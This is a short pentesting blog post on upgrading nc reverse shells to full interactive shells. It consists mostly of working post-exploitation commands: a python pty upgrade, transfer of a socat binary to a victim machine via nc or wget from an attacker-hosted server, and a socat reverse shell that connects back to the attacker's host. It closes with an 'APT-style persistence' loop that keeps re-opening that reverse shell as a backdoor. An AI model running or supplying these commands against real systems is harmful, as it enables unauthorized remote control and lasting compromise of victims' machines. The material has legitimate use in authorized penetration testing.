Methods to Upgrade nc Reverse Shells

pentesting shell

Ended up with a cheap nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?

Say no more <:

1. Upgrading using shell magic

This doesn’t always work - however if Python is present on the victims machine, it’s worth a try.

  1. Use bash on the attacker machine, zsh doesn’t seem to work.
  2. Get the nc shell.
  3. In the shell, execute:
python -c 'import pty; pty.spawn("/bin/sh")'

to allocate a TTY in the nc session.

  1. Execute
export TERM=xterm-256color

for proper color support.

  1. Put the shell into background using CTRL+Z.
  2. Configure the local shell using stty raw -echo.
  3. Execute fg to bring the nc shell back.
  4. Type reset and press enter.

Now a proper shell should be present which doesn’t close connections upon CTRL+C <:

If this didn’t work, try the next method:

2. Upgrading using socat

The tool socat can be used to create proper shell sessions. For this, a static binary of the tool is required which can be downloaded here.

First, transfer the socat binary to the victims machine using nc or wget:

The nc method:

a) Use nc -vvlp 1337 < socat to start a server which pushes the binary to the connecting machine.

b) On the victim, execute nc which downloads the file using nc <IP> <PORT> > /tmp/socat. You may manually stop the download process because it won’t terminate on its own.

The wget method:

a) Attacker: cd into the folder containing the binary and execute python -m SimpleHTTPServer <PORT>.

b) Use

cd /tmp && wget http://<IP>:<PORT>/socat

to download the file from the attackers machine.

After that, it’s time to spawn the shell:

  1. Create a socat listener on the attacking machine with
socat file:`tty`,raw,echo=0 tcp-listen:4444
  1. Spawn a proper reverse shell from the nc shell on the victims box using:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444

Fixing width

In case the with of the shell is too small, it can be fixed like this:

  1. Using a new terminal, execute stty -a to display the amount of columns and rows being used normally on the attackers machine.
  2. In the (socat) shell use stty rows <num> cols <num> to fix the width.

APT-style persistence

Create a lazy backdoor shell on the victims machine:

while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &

In case a previous shell breaks, just set up a new listener to be up and running again without the need to run an exploit again. Or use tsh

Related

This Weird YouTube Trick

python programming shell

Docker Breakout Using X11

docker pentesting hacking

2 Common Python Security Issues

pentesting python